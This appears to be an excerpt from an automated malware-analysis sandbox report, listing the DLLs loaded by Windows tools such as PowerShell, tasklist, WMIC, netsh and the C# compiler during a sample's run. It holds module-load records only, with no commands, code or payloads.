              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
